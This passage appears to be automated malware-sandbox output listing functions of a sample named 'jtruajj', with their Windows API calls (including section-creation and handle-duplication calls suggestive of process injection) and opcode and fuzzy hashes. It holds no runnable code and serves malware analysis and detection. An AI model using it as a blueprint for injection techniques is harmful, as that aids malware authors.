                                                                                                                    • Opcode Fuzzy Hash: 14db16c3e861f19ad5dfd30c38be67768c01ca1c8fcdc6992631d9b2414dadb5
                                                                                                                    • Instruction Fuzzy Hash: F7F037B1108209FBDF009F94CD51EAA3729AF09310F644577BA12781F5C63DDA12E72B
                                                                                                                    Function 00401932 Relevance: 1.3, APIs: 1, Instructions: 30sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(00001388), ref: 0040194E
                                                                                                                      • Part of subcall function 00401529: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                      • Part of subcall function 00401529: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDuplicateObjectSectionSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4152845823-0
                                                                                                                    • Opcode ID: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                                    • Instruction ID: 30c85490bd3e36b3d7497cee73256dee3cb4488b2b17691bada95d8d1bd3f612
                                                                                                                    • Opcode Fuzzy Hash: d565b972daf1ea01d692af33d09a01f0ed4f5aa4668cdc6292c3b22aaefac0ec
                                                                                                                    • Instruction Fuzzy Hash: 33F037B1204205FBDF009F94CD91EAE3629AF05310F644173BA12791F5D67DDA12E75B
                                                                                                                    Function 00418740 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LocalAlloc.KERNELBASE(00000000,00513D6C,00418DAF), ref: 00418748
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849711788.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_40b000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocLocal
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3494564517-0
                                                                                                                    • Opcode ID: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                    • Instruction ID: 68696ac1b9cb92420161d977e59fd9b705cf74f057d8962c0b4e3d7dbc73b596
                                                                                                                    • Opcode Fuzzy Hash: 8edb2acf596b02bf36b0311ec2b3e3f34bd0854dc09103549fc4bb4fc422a900
                                                                                                                    • Instruction Fuzzy Hash: FDB012F0A492009FD700CF54FC64BD03B74F358302F00C061F500C2164EB304908EB10

                                                                                                                    Non-executed Functions

                                                                                                                    Function 004189D0 Relevance: 6.0, APIs: 4, Instructions: 45memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00418A04
                                                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418A1F
                                                                                                                    • HeapCreate.KERNEL32(00000000,00000000,00000000), ref: 00418A42
                                                                                                                    • GetNumaProcessorNode.KERNEL32(?,00000000), ref: 00418A51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849711788.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_40b000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2776817195-0
                                                                                                                    • Opcode ID: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                                    • Instruction ID: bd9cb2cda3ccdbb603686fa1a54157cb247b1e4b5f6e470ed3bcac1d3601a900
                                                                                                                    • Opcode Fuzzy Hash: 87efacac19a89b0c53b9dbb33d5e1312a162f1387c04757d6307752c4e174176
                                                                                                                    • Instruction Fuzzy Hash: ED018474A402049BD760EB64EC55BE937B8FB1C755F00807BFA05A72D0DE746E88CB9A
                                                                                                                    Function 00418950 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • BuildCommDCBA.KERNEL32(00000000,?), ref: 00418964
                                                                                                                    • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00418976
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849711788.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_40b000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuildCommEnvironmentFreeStrings
                                                                                                                    • String ID: -
                                                                                                                    • API String ID: 2991353152-2547889144
                                                                                                                    • Opcode ID: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                                    • Instruction ID: b4672369b185086f5e4321c569724b1a241b362aa46ae39454cd2dcc54bfc028
                                                                                                                    • Opcode Fuzzy Hash: a724ab6c00ba43ed920c74289dad73afc07e5f40d831fe2fe4a3629ab1fe5b50
                                                                                                                    • Instruction Fuzzy Hash: 2DF0FCB18242449ADB119BA5DD807FE7B68E709330F51422EED0466240CB794EC59797